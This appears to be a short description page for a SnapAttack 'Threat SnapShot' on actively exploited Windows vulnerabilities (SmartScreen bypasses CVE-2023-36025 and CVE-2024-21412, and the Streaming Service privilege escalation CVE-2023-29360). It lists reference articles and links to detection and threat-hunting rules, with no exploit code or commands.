Let's face it - if patch management was a silver bullet then we wouldn't need vulnerability management, and threat actors know this. Vulnerabilities get picked up by threat actors and exploited as 1-days. In this week's Threat SnapShot, we'll look at a few recent Windows vulnerabilities that have been added to the CISA Known Exploited Vulnerability catalog and are actively used by threat actors like Water Hydra and Raspberry Robin. The first, a SmartScreen bypass (CVE-2023-36025 and CVE-2024-21412), allows code execution through crafted short links. The second, a privilege escalation vulnerability in the Windows Streaming Service driver (CVE-2023-29360), allows attackers to gain SYSTEM level privileges on a compromised host. We'll dig into these threats and discuss detection and threat hunting strategies to keep you protected.

References:

• https://thehackernews.com/2024/02/darkme-malware-targets-traders-using.html
• https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
• https://www.bleepingcomputer.com/news/security/cisa-warns-of-microsoft-streaming-bug-exploited-in-malware-attacks/
• https://big5-sec.github.io/posts/CVE-2023-29360-analysis/

SnapAttack Resources:

• https://app.snapattack.com/collection/e9f61b49-96ec-4c71-9f7a-0d9124092a08 - Collection: Water Hydra Exploits Microsoft Defender SmartScreen Zero-Day | Threat SnapShot
• https://app.snapattack.com/threat/34819dae-a7c4-3eb7-ec0e-a21cb42eedb7 - Threat: CVE-2023-36025 - Smartscreen Bypass
• https://app.snapattack.com/threat/dacaaf37-367c-2155-c3ea-8bb32af0a041 - Threat: CVE-2024-21412 SmartScreen Bypass
• https://app.snapattack.com/detection/2d7fd86e-46a4-4a66-bd8a-74a546e9118a - Detection: Possible CVE-2023-36025 Exploitation
• https://app.snapattack.com/detection/b72dd072-dccf-4100-a88f-c86c56c82e2c - Detection: Suspicious URL File
• https://app.snapattack.com/detection/4bb8e281-05d0-4239-af59-81ddcc588f8b - Detection: Suspicious WebDav HTTP Request
• https://app.snapattack.com/detection/387b1374-551f-4264-9f38-e3cad3d2ea4a - Detection: Suspicious File Execution From Internet Hosted WebDav Share
• https://app.snapattack.com/detection/3f1b37cf-2b67-4d9e-bf67-d5c445a27f54 - Detection: Windows WebDAV User Agent
• https://app.snapattack.com/detection/0393f30a-6d43-4c57-8a03-c49595aa809c - Detection: Suspicious WebDav Client Execution Via Rundll32.EXE
• https://app.snapattack.com/collection/eaecd83e-c70f-4759-a6f3-df7072e89a5e - Collection: Microsoft Streaming Service Elevation of Privilege (CVE-2023-29360) | Threat SnapShot
• https://app.snapattack.com/threat/bec9bd5a-9aa2-cbfd-51c0-05c21554d45f - Threat: CVE-2023-29360 Windows Streaming Service Privilege Escalation
• https://app.snapattack.com/detection/5b98ef3a-e0d7-49f3-83bd-445493d3313e - Detection: Elevated System Shell Spawned
• https://app.snapattack.com/detection/20759450-557b-46d8-9379-b648c4d10644 - Detection: Possible Winlogon Process Injection
• https://app.snapattack.com/detection/b33d0a5c-055b-411d-88f9-824ee3629206 - Detection: Win32 OpenProcess API Call With PROCESS_ALL_ACCESS Rights
• https://app.snapattack.com/detection/2eb4ff43-c7b8-46aa-8b4c-5d487d8042cc - Detection: Possible Windows Streaming Service Driver Exploitation
• https://app.snapattack.com/detection/d2d4af6a-6c2b-4d79-80c5-fc2cf12a2f68 - Detection: Windows Drivers Loaded by Signature